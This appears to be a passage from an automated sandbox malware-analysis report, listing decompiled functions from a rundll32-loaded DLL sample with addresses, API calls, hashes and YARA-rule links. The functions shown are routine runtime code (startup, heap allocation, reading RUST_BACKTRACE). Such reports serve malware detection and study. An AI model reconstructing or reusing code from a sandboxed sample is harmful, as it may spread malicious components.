											_t56 = E6ECC1290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_t59 = E6ECC1290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t56, _t86);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6ECDCA96( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6ECDC781(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6ECDCA96( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6ed1e174 - _t110; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6ECDCFFD(1, _t90, 1, _t113);
								E6ECDCEB9();
								E6ECDD31B();
								 *0x6ed1e4b8 =  *0x6ed1e4b8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6ECDC970();
								_t67 = E6ECDD19E(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6ECDC97D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6ed1e4b8 = 1;
						if(E6ECDCF8F(_t132) != 0) {
							E6ECDCEAD(E6ECDD2EF());
							E6ECDCED1();
							_t80 = E6ECE0E51(0x6ecea17c, 0x6ecea18c); // executed
							_pop(_t102);
							if(_t80 == 0 && E6ECDCF64(1, _t102) != 0) {
								E6ECE0E26(0x6ecea158, 0x6ecea178); // executed
								 *0x6ed1e4b8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6ECDC8B7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6ECDD1C6();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6ECDD0ED(_t85, _t106, _t121, _t138) != 0) {
									 *0x6ecea154( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6ed1e174 =  *0x6ed1e174 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6ecdc7d4
0x6ecdc7d4
0x6ecdc7d4
0x6ecdc7d4
0x6ecdc7d4
0x6ecdc7db
0x6ecdc7e2
0x6ecdc7e7
0x6ecdc7ea
0x6ecdc8c1
0x6ecdc8c1
0x6ecdc8c1
0x00000000
0x6ecdc7f0
0x6ecdc7f5
0x6ecdc7f8
0x6ecdc7fa
0x6ecdc7fd
0x6ecdc801
0x6ecdc808
0x6ecdc8d5
0x6ecdc8da
0x6ecdc8db
0x6ecdc8dd
0x6ecdc8e2
0x6ecdc8e7
0x6ecdc8ec
0x6ecdc8ee
0x6ecdc8f5
0x6ecdc8fd
0x6ecdc900
0x6ecdc909
0x6ecdc90c
0x6ecdc90f
0x6ecdc916
0x6ecdc985
0x6ecdc98a
0x6ecdc98b
0x6ecdc98d
0x6ecdc992
0x6ecdc997
0x6ecdc99a
0x6ecdc99c
0x6ecdc9ad
0x6ecdc9ad
0x6ecdc9b1
0x6ecdc9b4
0x6ecdc9c0
0x6ecdc9c0
0x6ecdc9cd
0x6ecdc9cf
0x6ecdc9d2
0x6ecdc9d4
0x6ecdc9df
0x6ecdc9e4
0x6ecdc9e6
0x6ecdc9e9
0x6ecdc9eb
0x00000000
0x00000000
0x6ecdc9eb
0x6ecdc9b6
0x6ecdc9b6
0x6ecdc9b9
0x00000000
0x6ecdc9bb
0x6ecdc9bb
0x6ecdc9f1
0x6ecdc9f6
0x6ecdc9fb
0x6ecdc9fd
0x6ecdca00
0x6ecdca03
0x6ecdca05
0x6ecdca07
0x6ecdca0e
0x6ecdca13
0x6ecdca15
0x6ecdca15
0x6ecdca1b
0x6ecdca1c
0x6ecdca21
0x6ecdca27
0x6ecdca27
0x6ecdca07
0x6ecdca2c
0x6ecdca2e
0x6ecdca35
0x6ecdca3f
0x6ecdca41
0x6ecdca44
0x6ecdca46
0x6ecdca52
0x6ecdca7a
0x6ecdca7a
0x6ecdca30
0x6ecdca30
0x6ecdca33
0x00000000
0x00000000
0x6ecdca33
0x6ecdca2e
0x6ecdc9b9
0x6ecdca7d
0x6ecdca84
0x6ecdc99e
0x6ecdc99e
0x6ecdc9a4
0x00000000
0x6ecdc9a6
0x6ecdc9a6
0x6ecdc9a6
0x6ecdc9a4
0x6ecdca89
0x6ecdca95
0x6ecdc918
0x6ecdc918
0x6ecdc91d
0x6ecdc922
0x6ecdc927
0x6ecdc92e
0x6ecdc932
0x6ecdc93c
0x6ecdc948
0x6ecdc94a
0x6ecdc94a
0x6ecdc94c
0x6ecdc94f
0x6ecdc956
0x6ecdc95b
0x00000000
0x6ecdc95b
0x6ecdc8f0
0x6ecdc8f0
0x6ecdc95d
0x6ecdc960
0x6ecdc96c
0x6ecdc96c
0x6ecdc80e
0x6ecdc80e
0x6ecdc81f
0x6ecdc826
0x6ecdc82b
0x6ecdc83a
0x6ecdc840
0x6ecdc843
0x6ecdc858
0x6ecdc85f
0x6ecdc869
0x6ecdc86b
0x6ecdc86b
0x6ecdc843
0x6ecdc86e
0x6ecdc875
0x6ecdc87c
0x00000000
0x6ecdc87e
0x6ecdc883
0x6ecdc885
0x6ecdc888
0x6ecdc88a
0x6ecdc893
0x6ecdc8a1
0x6ecdc8a7
0x6ecdc8a7
0x6ecdc893
0x6ecdc8a9
0x6ecdc8b1
0x6ecdc8b1
0x6ecdc8c3
0x6ecdc8c6
0x6ecdc8d2
0x6ecdc8d2
0x6ecdc808

APIs

__RTC_Initialize.LIBCMT ref: 6ECDC821

Part of subcall function 6ECDCEAD: InitializeSListHead.KERNEL32(6ED1E4A0,6ECDC82B,6ED1AF60,00000010,6ECDC7BC,?,?,?,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8), ref: 6ECDCEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ECDC88B

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: fccb7794a7b7d9ff04bf91c7e8954e2a75659050223e119a57d745e0a8a5260d
Instruction ID: 9d13be07c0fa062891bced4b2be8796a64a7ff3f8ad4d8f12cc2e8844c34971c
Opcode Fuzzy Hash: fccb7794a7b7d9ff04bf91c7e8954e2a75659050223e119a57d745e0a8a5260d
Instruction Fuzzy Hash: 9321C032988306AEEB406BF49841FDD7B759F06328F100D15E6916FAC1FB27445ECAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE2C26, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6ECE2C26(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6ed1e938, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6ECE54DC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6ECE1FCF())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6ECE0E8E(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6ece2c2c
0x6ece2c31
0x6ece2c3f
0x6ece2c3f
0x6ece2c45
0x6ece2c47
0x6ece2c47
0x6ece2c5e
0x6ece2c67
0x6ece2c6f
0x00000000
0x00000000
0x6ece2c4f
0x6ece2c51
0x6ece2c73
0x6ece2c78
0x6ece2c7e
0x00000000
0x6ece2c7e
0x6ece2c54
0x6ece2c5a
0x6ece2c5c
0x00000000
0x00000000
0x6ece2c5c
0x00000000
0x6ece2c5e
0x6ece2c37
0x6ece2c3d
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6ECE283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ECDCB0C,?,?,6ECDC074), ref: 6ECE2C67

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9804aeed2944f9b0250a272d72e5df988eb1928a619caf5edc613548f6d5c5d4
Instruction ID: 8f6ba403c9f62a2ad1ae8f5c14d863c58570d13c82a752629df0c525f04b771f
Opcode Fuzzy Hash: 9804aeed2944f9b0250a272d72e5df988eb1928a619caf5edc613548f6d5c5d4
Instruction Fuzzy Hash: E6F0E932244A276AFB5D1BF7C926BDB7B5CAF41760B008512FC14ABD88FB30D41282E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE22E9, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6ECE22E9(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6ECE1FCF())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6ed1e938, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6ECE54DC();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6ECE0E8E(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6ece22ef
0x6ece22f5
0x6ece2327
0x6ece232c
0x6ece2332
0x00000000
0x6ece2332
0x6ece22f9
0x6ece22fb
0x6ece22fb
0x6ece2312
0x6ece231b
0x6ece2323
0x00000000
0x00000000
0x6ece2303
0x6ece2305
0x00000000
0x00000000
0x6ece2308
0x6ece230e
0x6ece2310
0x00000000
0x00000000
0x6ece2310
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6ECDCB0C,?,?,6ECDC074,00000400,FFFDC801,?,?,00000001), ref: 6ECE231B

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bd210d3af71a1ba5fc36e2b05012969076e893725cebe0dda93e51e692beec0f
Instruction ID: b364af7ffa30e66a4ec84648db600b3ee951031e26848c0c2d721c5e08bea01e
Opcode Fuzzy Hash: bd210d3af71a1ba5fc36e2b05012969076e893725cebe0dda93e51e692beec0f
Instruction Fuzzy Hash: 18E065321416279AFA6A16E64C20B9A765CBF423A1F010520ED5497F88FB10C80189E1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDBE30, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BasepGetAppCompatData.KERNEL32(?,?,?,?,00000000,0000000F), ref: 6ECDBE56

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: BasepCompatData
String ID:
API String ID: 1597993171-0
Opcode ID: cba59baa52f45f723a79fac7bfe947e5c2af044969084c559d19153bb2a517f4
Instruction ID: 61f4f420ffcec7b653f7478218ff3397ce3b3a121623e347aab1f65bb712f9ce
Opcode Fuzzy Hash: cba59baa52f45f723a79fac7bfe947e5c2af044969084c559d19153bb2a517f4
Instruction Fuzzy Hash: BDD0C779004202AADF024FA0EE0194FBAA6EFC4A11F400D18B764504F8E773C829FB23

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ECCD380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6ECCD380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ECD39D0;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed1e128; // 0xc40000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ECE9A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed0face;
							if(_t264 != 0x6ed0face) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed0face;
									if(_t229 == 0x6ed0face) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed0face;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed0face;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed0face;
											if(_t264 == 0x6ed0face) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed0face;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed0face;
												if(_t273 == 0x6ed0face) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed0face;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ECE9A30( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ECDE9D0(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed0f8cc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ECE9A30( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ECD0D10(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed1e128, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed1e128, 0, _t167);
													}
													HeapFree( *0x6ed1e128, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed1e128, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed106d8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed1e128, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed1e128, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed1e128, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ECE92F0(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ECE9470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed106e0);
						asm("ud2");
						__eflags =  &_a8;
						E6ECC48D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ECCD270(_t263);
					} else {
						 *0x6ed1e128 = _t142;
						goto L3;
					}
				}
				L96:
			}

APIs

GetProcessHeap.KERNEL32 ref: 6ECCD3BC
HeapAlloc.KERNEL32(00C40000,00000000,0000000A), ref: 6ECCD3D3

Strings

RUST_BACKTRACE, xrefs: 6ECCD48A, 6ECCD4C0

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
